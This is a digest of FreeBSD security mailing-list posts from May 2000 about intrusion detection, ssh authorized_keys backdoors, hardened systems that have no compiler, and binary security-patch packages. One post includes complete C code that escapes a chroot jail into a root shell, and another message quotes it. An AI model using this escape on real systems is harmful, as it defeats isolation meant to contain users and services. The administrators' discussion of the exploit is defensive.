virtually yours   82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 19:33: 8 2000
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id E271837B7AB for ; Thu, 11 May 2000 19:33:05 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id TAA21901; Thu, 11 May 2000 19:32:23 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda21899; Thu May 11 19:32:13 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id TAA54444; Thu, 11 May 2000 19:32:12 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdg54442; Thu May 11 19:31:26 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4C2VPD35790; Thu, 11 May 2000 19:31:25 -0700 (PDT)
Message-Id: <200005120231.e4C2VPD35790@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdC35785; Thu May 11 19:30:34 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.0-STABLE
X-Sender: cy
To: Mark Murray
Cc: Paul Hart , freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
In-reply-to: Your message of "Thu, 11 May 2000 22:44:22 +0200." <200005112044.WAA41333@grimreaper.grondar.za>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 11 May 2000 19:30:34 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <200005112044.WAA41333@grimreaper.grondar.za>, Mark Murray writes:
> [ Change the freaking subject already!! ]
>
> > That's a scary thought. "Our security depends on all attackers being
> > stupid." Shouldn't we work toward meaningful tools that cannot be
> > subverted even by the most skilled of attackers? Not all attackers are
> > script kiddies and it would be foolish of us to think they are.
>
> *Bing*
>
> for (;;)
> 	printf("There is no silver bullet!\n");
>
> The only workable tool is a well-paid, paranoid security guy. The rest
> are there to help the WPPSG.

I think that having tripwire or something with the same functionality
and features should be included in the base system. Talking to a
salesman at Tripwire, they have plans to release the Tripwire 2.x
source. Once they do I'll attempt a port.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 19:48:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mtiwmhc23.worldnet.att.net (mtiwmhc23.worldnet.att.net [204.127.131.48]) by hub.freebsd.org (Postfix) with ESMTP id 21A6037B789 for ; Thu, 11 May 2000 19:48:46 -0700 (PDT) (envelope-from shalunov@att.net)
Received: from sharik.worldnet.att.net ([12.68.38.143]) by mtiwmhc23.worldnet.att.net (InterMail vM.4.01.02.39 201-229-119-122) with ESMTP id <20000512024844.NDDA3646.mtiwmhc23.worldnet.att.net@sharik.worldnet.att.net>; Fri, 12 May 2000 02:48:44 +0000
Received: (from shalunov@localhost) by sharik.worldnet.att.net (8.9.2/8.9.2) id WAA00497; Thu, 11 May 2000 22:48:42 -0400 (EDT) (envelope-from shalunov)
To: "Jeffrey J. Mountin"
Cc: freebsd-security@freebsd.org
Subject: Re: envy.vuurwerk.nl daily run output
References: <20000509150609.L42267@vuurwerk.nl> <4.3.2.20000511192741.00c24ac0@207.227.119.2>
From: stanislav shalunov
Date: 11 May 2000 22:48:41 -0400
In-Reply-To: "Jeffrey J. Mountin"'s message of "Thu, 11 May 2000 20:10:41 -0500"
Message-ID: <87snvo8ovq.fsf@sharik.worldnet.att.net>
Lines: 15
X-Mailer: Gnus v5.5/Emacs 20.3
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"Jeffrey J. Mountin" writes:

> You could always force the ownership of .ssh/ and any files under it
> to root.

But the owner of the home directory can just "mv .ssh ssh-forget-me".
If the user already has an authorized_keys file, he'd probably notice.
Otherwise, especially if he doesn't ssh out from that machine or it
has a good known_hosts file it can go unnoticed.

Or did you mean "...and check that ownership didn't change daily"?
(They could move the directories around daily, too.)

--
stanislav shalunov | Speaking only for myself.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 20: 7: 7 2000
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id EFB4037B943 for ; Thu, 11 May 2000 20:07:04 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id XAA22136; Thu, 11 May 2000 23:06:57 -0400 (EDT) (envelope-from wollman)
Date: Thu, 11 May 2000 23:06:57 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200005120306.XAA22136@khavrinen.lcs.mit.edu>
To: Cy Schubert - ITSD Open Systems Group
Cc: Mark Murray , Paul Hart , freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
In-Reply-To: <200005120231.e4C2VPD35790@cwsys.cwsent.com>
References: <200005112044.WAA41333@grimreaper.grondar.za> <200005120231.e4C2VPD35790@cwsys.cwsent.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

< said:

> I think that having tripwire or something with the same functionality
> and features should be included in the base system.

We do. It would take a bit of work to create an `exclude' file (see
my recent commit) so that constantly-changing files would not raise
alarms, but otherwise `mtree -K md5digest,sha1digest,ripemd160digest'
should do the trick.

-GAWollman

--
Garrett A. Wollman   | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu  | O Siem / The fires of freedom
Opinions not those of| Dance in the burning flame
MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 21: 6:26 2000
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 52D6037BCC8 for ; Thu, 11 May 2000 21:06:22 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id VAA22420; Thu, 11 May 2000 21:05:45 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda22418; Thu May 11 21:05:36 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id VAA55812; Thu, 11 May 2000 21:05:36 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdi55801; Thu May 11 21:05:28 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4C45S938145; Thu, 11 May 2000 21:05:28 -0700 (PDT)
Message-Id: <200005120405.e4C45S938145@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdH38132; Thu May 11 21:04:46 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.0-STABLE
X-Sender: cy
To: matt@csis.gvsu.edu
Cc: Derek Werthmuller , freebsd-security@FreeBSD.ORG
Subject: Re: Applying patches with out a compiler
In-reply-to: Your message of "Thu, 11 May 2000 15:15:44 EDT." <20000511151544.A6826@contempt.badmofo.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 11 May 2000 21:04:46 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <20000511151544.A6826@contempt.badmofo.net>, matt@csis.gvsu.edu writes:
> It took Derek Werthmuller 17 lines to say:
> > I'm interested in applying standard "Release" versions of FreeBSD without
> > using a compiler in the system. I generally don't advise leaving a working
> > compiler in say a firewall or a hardened system. I know that I can have a
> > separate system that I can use to connect via CVS and use that to update the
> > hardened systems. But doesn't that just keep my sources up to date and I
> > still need to build/build world every so often? Is there another way to
> > apply the security related patches ?
>
> How about 'chmod 500 /usr/bin/{cc,ld}' and do your 'make world's as root?
> If an attacker has root, using the compiler is the least of your worries.

All an attacker would need to do is ftp a C compiler from another
system or better yet ftp the binaries required to compromise your
system from another system.

A better approach would be to make key (or all system) files immutable
and your logs append only and run your system at securelevel 2 or 3.
This wouldn't necessarily stop anyone from breaking root but it would
limit the damage.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 2: 9:32 2000
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 0701D37BCE4 for ; Fri, 12 May 2000 02:09:28 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost.freebsd.dk [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.3) with ESMTP id KAA04228; Fri, 12 May 2000 10:00:12 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Paul Hart
Cc: Adam Laurie , freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
In-reply-to: Your message of "Thu, 11 May 2000 10:03:38 MDT."
Date: Fri, 12 May 2000 10:00:11 +0200
Message-ID: <4226.958118411@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message , Paul Hart writes:
>On Thu, 11 May 2000, Adam Laurie wrote:
>
>> If someone backdoors your system with an authorized key, and is
>> confident they can gain root from a luser account, they don't need to
>> go any further, and it's extremely likely that the change will go
>> unnoticed *forever*
>
>But if you have hostile local users with root access, can you even trust
>the output from /etc/security?

Yes, if you put them in a jail(8).

--
Poul-Henning Kamp             | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG               | TCP/IP since RFC 956
FreeBSD coreteam member       | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 6:22:50 2000
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id D99BD37BB3D for ; Fri, 12 May 2000 06:22:46 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA25489; Fri, 12 May 2000 06:20:00 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda25487; Fri May 12 06:19:59 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id GAA59363; Fri, 12 May 2000 06:19:58 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdY59353; Fri May 12 06:19:41 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4CDJev40777; Fri, 12 May 2000 06:19:40 -0700 (PDT)
Message-Id: <200005121319.e4CDJev40777@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdN40751; Fri May 12 06:19:06 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.0-STABLE
X-Sender: cy
To: Poul-Henning Kamp
Cc: Paul Hart , Adam Laurie , freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
In-reply-to: Your message of "Fri, 12 May 2000 10:00:11 +0200." <4226.958118411@critter.freebsd.dk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 12 May 2000 06:19:06 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <4226.958118411@critter.freebsd.dk>, Poul-Henning Kamp writes:
> In message , Paul Hart writes:
> >On Thu, 11 May 2000, Adam Laurie wrote:
> >
> >> If someone backdoors your system with an authorized key, and is
> >> confident they can gain root from a luser account, they don't need to
> >> go any further, and it's extremely likely that the change will go
> >> unnoticed *forever*
> >
> >But if you have hostile local users with root access, can you even trust
> >the output from /etc/security?
>
> Yes, if you put them in a jail(8).

I was about to comment that anyone with root can break out of any
chrooted environment including jail, however testing the break out of
jail exploit (good thing I tested before I spoke), which BTW worked on
FreeBSD-3 and numerous other platforms including Linux, Solaris, and
Tru64-UNIX, appears to no longer work under 4.0 -- which is a good
thing! When did the FreeBSD chroot(2) get fixed?

Once again FreeBSD leads the way.

Following is the break-out-of-jail code.

#include <assert.h>
#include <unistd.h>

const char *shell = "/bin/sh";
const char *lowerdir = "/tmp";

int main() {
    int i;

    /* chroot into lowerdir while the working directory stays where it was */
    assert(chdir("/") != -1);
    assert(chroot(lowerdir) != -1);
    /* the working directory is now outside the new root, so ".." keeps climbing */
    for (i = 0; i < 32; i++)
        assert(chdir("..") != -1);
    /* make the directory reached this way the root again */
    assert(chroot(".") != -1);

    assert(execl(shell, shell, (char *)NULL) != -1);
}

Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 7:38:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from mirage.nlink.com.br (mirage.nlink.com.br [200.249.195.3]) by hub.freebsd.org (Postfix) with SMTP id 7C88437B5A2 for ; Fri, 12 May 2000 07:38:31 -0700 (PDT) (envelope-from paulo@nlink.com.br) Received: (qmail 26346 invoked by uid 501); 12 May 2000 14:38:22 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 12 May 2000 14:38:22 -0000 Date: Fri, 12 May 2000 11:38:22 -0300 (EST) From: Paulo Fragoso To: freebsd-security@freebsd.org Subject: CHROOT Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Is there any HOWTO chrooted apache webserver? Thanks, Paulo Fragoso. -- __O _-\<,_ Why drive when you can bike? 
(_)/ (_) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 8:36:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from zerg.crazyfoo.org (Zerg.CrazyFOO.OrG [206.55.133.186]) by hub.freebsd.org (Postfix) with ESMTP id 08FB437BEAD for ; Fri, 12 May 2000 08:36:12 -0700 (PDT) (envelope-from pzimdars@Zerg.CrazyFOO.Org) Received: by zerg.crazyfoo.org (Postfix, from userid 501) id 6A2835A037; Fri, 12 May 2000 08:37:47 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by zerg.crazyfoo.org (Postfix) with ESMTP id C7C75E380B; Fri, 12 May 2000 08:37:46 -0700 (PDT) Date: Fri, 12 May 2000 08:37:46 -0700 (PDT) From: Paul Zimdars To: Paulo Fragoso Cc: freebsd-security@freebsd.org Subject: Re: CHROOT In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Maybe try packetstorm.securify.com. They have directions to do it for a Linux box. I'm sure it goes almost the same for a BSD box. Paul On Fri, 12 May 2000, Paulo Fragoso wrote: > Hi, > > Is there any HOWTO chrooted apache webserver? > > Thanks, > Paulo Fragoso. > > -- > __O > _-\<,_ Why drive when you can bike? 
> (_)/ (_) > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 8:47:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from modemcable127.61-201-24.mtl.mc.videotron.net (modemcable127.61-201-24.mtl.mc.videotron.net [24.201.61.127]) by hub.freebsd.org (Postfix) with SMTP id E3D1A37B54E for ; Fri, 12 May 2000 08:47:29 -0700 (PDT) (envelope-from patrick@mindstep.com) Received: (qmail 62705 invoked from network); 12 May 2000 15:47:29 -0000 Received: from patrak.local.mindstep.com (HELO PATRAK) (192.168.10.4) by jacuzzi.local.mindstep.com with SMTP; 12 May 2000 15:47:29 -0000 Message-ID: <0e8c01bfbc29$4432e390$040aa8c0@local.mindstep.com> From: "Patrick Bihan-Faou" To: "Cy Schubert - ITSD Open Systems Group" Cc: References: <4226.958118411@critter.freebsd.dk> <200005121319.e4CDJev40777@cwsys.cwsent.com> Subject: Re: envy.vuurwerk.nl daily run output Date: Fri, 12 May 2000 11:46:41 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, > I was about to comment that anyone with root can break out of any > chrooted environment including jail, however testing the break out of > jail exploit (good thing I tested before I spoke), which BTW worked on > FreeBSD-3 and numerous other platforms including Linux, Solaris, and > Tru64-UNIX, appears to no longer work under 4.0 -- which is a good > thing! When did the FreeBSD chroot(2) get fixed? > > Once again FreeBSD leads the way. > > Following is the break-out-of-jail code. 
I just tested the exploit code on a 3.4 system and a 4.0 system and my results are:
- if I run the program as root, then the program runs properly: starts SH in /
- if I run the program as !root, then the program fails to chroot back to / (I guess this is the expected behaviour).

For info:
The FreeBSD 3.x machine: FreeBSD jacuzzi.local.mindstep.com 3.4-STABLE FreeBSD 3.4-STABLE #8: Thu Apr 27 00:13:41 EDT 2000 patrick@jacuzzi.local.mindstep.com:/usr/src/sys/compile/JACUZZI i386
The FreeBSD 4.0 machine: FreeBSD nitro 4.0-STABLE FreeBSD 4.0-STABLE #3: Fri Apr 21 15:10:09 EDT 2000 patrick@nitro:/usr/src/sys/compile/NITRO i386

So my question is: is the exploit really fixed? Or is it normal for root to be able to break loose from chroot? Patrick. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 9:40:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 1E60337B5EB for ; Fri, 12 May 2000 09:40:10 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id MAA48513; Fri, 12 May 2000 12:40:05 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 12 May 2000 12:40:04 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Derek Werthmuller Cc: freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler In-Reply-To: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 11 May 2000, Derek Werthmuller wrote: > I'm interested in applying standard "Release" versions of FreeBSD without > using a compiler in the system. 
I generally don't advise leaving a working > compiler in say a firewall or a hardened system. I know that I can have a > separate system that I can use to connect via CVS and use that to update the > hardened systems. But doesn't that just keep my sources up to date and I > still need to build/build world every so often? Is there another way to > apply the security related patches ? For patches where it's appropriate, I've been strongly considering releasing "packages" that update the key parts of the base OS for security fixes. This would be similar to the BSD/OS patch level support for fixes, although restricted only to security stuff. This would provide access to security fixes for non-source-centric sites, which I think is important. With 4.0 I haven't had the opportunity to exercise this possibility as yet. :-) I.e., pkg_add secpatch_4.0-RELEASE_001.tgz Would replace the faulty binaries with better ones, and leave behind a package install record so you could easily determine which security patches are installed. And if appropriate, could back up the original binaries allowing pkg_delete to restore the original state. Any thoughts on this? 
Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 9:47:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from easeway.com (ns1.easeway.com [209.69.39.1]) by hub.freebsd.org (Postfix) with ESMTP id CE8DB37B5D7; Fri, 12 May 2000 09:47:09 -0700 (PDT) (envelope-from mwlucas@easeway.com) Received: (from mwlucas@localhost) by easeway.com (8.8.8/8.8.5) id MAA04341; Fri, 12 May 2000 12:32:06 -0400 (EDT) Message-Id: <200005121632.MAA04341@easeway.com> Subject: Re: Applying patches with out a compiler In-Reply-To: from Robert Watson at "May 12, 0 12:40:04 pm" To: rwatson@FreeBSD.ORG (Robert Watson) Date: Fri, 12 May 100 12:32:06 -0400 (EDT) Cc: freebsd-security@FreeBSD.ORG From: mwlucas@exceptionet.com X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Would replace the faulty binaries with better ones, and leave behind a > package install record so you could easily determine which security > patches are installed. And if appropriate, could back up the original > binaries allowing pkg_delete to restore the original state. > > Any thoughts on this? Thoughts? How about, "yes, please, sir!" Make world is nice, but doesn't cut it on a 486. Many of my clients don't run NFS, so I have to bring along my laptop NFS server. A buncha users don't have that option, I'm sure. ==ml -- Michael Lucas | Exceptionet, Inc. 
| www.exceptionet.com "Exceptional Networking" | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 9:58:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 4D02237BF75; Fri, 12 May 2000 09:58:44 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id MAA86229; Fri, 12 May 2000 12:58:42 -0400 (EDT) From: Igor Roshchin Message-Id: <200005121658.MAA86229@giganda.komkon.org> Subject: Re: Applying patches with out a compiler In-Reply-To: from "Robert Watson" at "May 12, 2000 12:40:04 pm" To: "Robert Watson" Date: Fri, 12 May 2000 12:58:42 -0400 (EDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > For patches where it's appropriate, I've been strongly considering > releasing "packages" that update the key parts of the base OS for security > fixes. This would be similar to the BSD/OS patch level support for fixes, > although restricted only to security stuff. This would provide access to > security fixes for non-source-centric sites, which I think is important. > With 4.0 I haven't had the opportunity to exercise this possibility as > yet. :-) > > I.e., > > pkg_add secpatch_4.0-RELEASE_001.tgz > > Would replace the faulty binaries with better ones, and leave behind a > package install record so you could easily determine which security > patches are installed. And if appropriate, could back up the original > binaries allowing pkg_delete to restore the original state. > > Any thoughts on this? 
> > Robert N M Watson > That would be very useful for the production environment, as well as for the low-end computers, or just computers with limited resources. Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 10:46:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id B655B37B5DE; Fri, 12 May 2000 10:46:07 -0700 (PDT) (envelope-from d.m.pick@qmw.ac.uk) Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.02 #1) id 12qJVf-0000Ki-00; Fri, 12 May 2000 18:45:59 +0100 Received: from cgaa180 by xi.css.qmw.ac.uk with local (Exim 1.92 #1) id 12qJVg-0005ow-00; Fri, 12 May 2000 18:46:00 +0100 X-Mailer: exmh version 2.0.2 2/24/98 To: Robert Watson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler In-reply-to: Your message of "Fri, 12 May 2000 12:40:04 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 12 May 2000 18:46:00 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > For patches where it's appropriate, I've been strongly considering > releasing "packages" that update the key parts of the base OS for security > fixes. This would be similar to the BSD/OS patch level support for fixes, > although restricted only to security stuff. This would provide access to > security fixes for non-source-centric sites, which I think is important. > With 4.0 I haven't had the opportunity to exercise this possibility as > yet. :-) > > I.e., > > pkg_add secpatch_4.0-RELEASE_001.tgz > > Would replace the faulty binaries with better ones, and leave behind a > package install record so you could easily determine which security > patches are installed. 
And if appropriate, could back up the original > binaries allowing pkg_delete to restore the original state. > > Any thoughts on this? Very useful. A few points: - We'd need to allow for USA/international versions, preferably with different names. Perhaps a third "set" of names for the "patches" that are independent of geography: - secpatch_4.0-RELEASE_global-001 - secpatch_4.0-RELEASE_international-001 - secpatch_4.0-RELEASE_USAonly-001 - The automatic dependency system would be magic, especially if there was a "top level" package listing the latest "patches" - possibly another "set" containing *source* patches for the kernel only, for the sites who need to rebuild the kernel but carry no other sources, to make the installation of these important patches easier and hence more likely to happen A few questions: - should each "patch" package have all the previous ones as dependencies? - most package names seem to use the convention of a basic name, a hyphen, then the version number; does this really matter so the package names would need to be modified slightly? - how sensitive can the system be made to the fact that different combinations of distribution sets give different sets of binary programs: there's the international/USA versions, but (as I've just realised), there's also the issue of kerberos/non-kerberos versions of some binaries. 
-- David Pick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 11:11:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id C1C2937B802 for ; Fri, 12 May 2000 11:11:12 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id UAA16066; Fri, 12 May 2000 20:06:20 +0200 (CEST) Message-ID: <20000512200619.A14067@foobar.franken.de> Date: Fri, 12 May 2000 20:06:19 +0200 From: Harold Gutch To: Cy Schubert - ITSD Open Systems Group , Poul-Henning Kamp Cc: Paul Hart , Adam Laurie , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output References: <4226.958118411@critter.freebsd.dk> <200005121319.e4CDJev40777@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <200005121319.e4CDJev40777@cwsys.cwsent.com>; from Cy Schubert - ITSD Open Systems Group on Fri, May 12, 2000 at 06:19:06AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 12, 2000 at 06:19:06AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > chrooted environment including jail, however testing the break out of > jail exploit (good thing I tested before I spoke), which BTW worked on > FreeBSD-3 and numerous other platforms including Linux, Solaris, and > Tru64-UNIX, appears to no longer work under 4.0 -- which is a good > thing! When did the FreeBSD chroot(2) get fixed? > > Once again FreeBSD leads the way. > > Following is the break-out-of-jail code. 
>
> #include <assert.h>
> #include <unistd.h>
>
> const char *shell = "/bin/sh";
> const char *lowerdir = "/tmp";
>
> int main() {
>     int i;
>
